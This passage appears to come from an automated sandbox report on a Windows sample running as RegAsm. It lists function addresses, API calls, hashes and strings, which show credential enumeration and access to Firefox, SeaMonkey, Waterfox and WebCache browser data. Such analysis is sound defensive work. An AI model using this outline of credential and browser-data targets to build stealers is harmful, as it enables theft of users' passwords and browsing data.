                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                      • String ID:
                      • API String ID: 3191383707-0
                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                      APIs
                      • memset.MSVCRT ref: 00403CBF
                      • memset.MSVCRT ref: 00403CD4
                      • memset.MSVCRT ref: 00403CE9
                      • memset.MSVCRT ref: 00403CFE
                      • memset.MSVCRT ref: 00403D13
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403DDA
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                      • String ID: Waterfox$Waterfox\Profiles
                      • API String ID: 1829478387-11920434
                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                      APIs
                      • memset.MSVCRT ref: 00403E50
                      • memset.MSVCRT ref: 00403E65
                      • memset.MSVCRT ref: 00403E7A
                      • memset.MSVCRT ref: 00403E8F
                      • memset.MSVCRT ref: 00403EA4
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403F6B
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                      • API String ID: 1829478387-2068335096
                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                      APIs
                      • memset.MSVCRT ref: 00403FE1
                      • memset.MSVCRT ref: 00403FF6
                      • memset.MSVCRT ref: 0040400B
                      • memset.MSVCRT ref: 00404020
                      • memset.MSVCRT ref: 00404035
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 004040FC
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                      • API String ID: 1829478387-3369679110
                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                      • API String ID: 3510742995-2641926074
                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                      APIs
                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                      • GetLastError.KERNEL32 ref: 0041847E
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@CreateErrorFileLast
                      • String ID: |A
                      • API String ID: 4200628931-1717621600
                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                      APIs
                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 004033B7
                      • memcpy.MSVCRT ref: 004033D0
                      • wcscmp.MSVCRT ref: 004033FC
                      • _wcsicmp.MSVCRT ref: 00403439
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                      • String ID: $0.@
                      • API String ID: 3030842498-1896041820
                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 2941347001-0
                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                      APIs
                      • memset.MSVCRT ref: 00403C09
                      • memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                      • wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • wcscat.MSVCRT ref: 00403C70
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memsetwcscat$wcscpywcslen
                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                      • API String ID: 2489821370-1174173950
                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                      APIs
                      • memset.MSVCRT ref: 0040A824
                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • wcscpy.MSVCRT ref: 0040A854
                      • wcscat.MSVCRT ref: 0040A86A
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 669240632-0
                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                      APIs
                      • wcschr.MSVCRT ref: 00414458
                      • _snwprintf.MSVCRT ref: 0041447D
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                      • String ID: "%s"
                      • API String ID: 1343145685-3297466227
                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProcessTimes
                      • String ID: GetProcessTimes$kernel32.dll
                      • API String ID: 1714573020-3385500049
                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                      APIs
                      • memset.MSVCRT ref: 004087D6
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                      • memset.MSVCRT ref: 00408828
                      • memset.MSVCRT ref: 00408840
                      • memset.MSVCRT ref: 00408858
                      • memset.MSVCRT ref: 00408870
                      • memset.MSVCRT ref: 00408888
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                      • String ID:
                      • API String ID: 2911713577-0
                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcmp
                      • String ID: @ $SQLite format 3
                      • API String ID: 1475443563-3708268960
                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _wcsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 1579243037-1578091866
                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                      APIs
                      • memset.MSVCRT ref: 0040E60F
                      • memset.MSVCRT ref: 0040E629
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                      • API String ID: 3354267031-2114579845
                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                      APIs
                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                      • LockResource.KERNEL32(00000000), ref: 004148EF
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID:
                      • API String ID: 3473537107-0
                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                      APIs
                      Strings
                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: only a single result allowed for a SELECT that is part of an expression
                      • API String ID: 2221118986-1725073988
                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                      APIs
                      • Sleep.KERNEL32(00000064), ref: 004175D0
                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ChangeCloseFindNotificationSleep
                      • String ID: }A
                      • API String ID: 1821831730-2138825249
                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@DeleteObject
                      • String ID: r!A
                      • API String ID: 1103273653-628097481
                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??2@
                      • String ID:
                      • API String ID: 1033339047-0
                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                      APIs
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      • memcmp.MSVCRT ref: 00444BA5
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$memcmp
                      • String ID: $$8
                      • API String ID: 2808797137-435121686
                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                      Strings
                      • duplicate column name: %s, xrefs: 004307FE
                      • too many columns on %s, xrefs: 00430763
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID:
                      • String ID: duplicate column name: %s$too many columns on %s
                      • API String ID: 0-1445880494
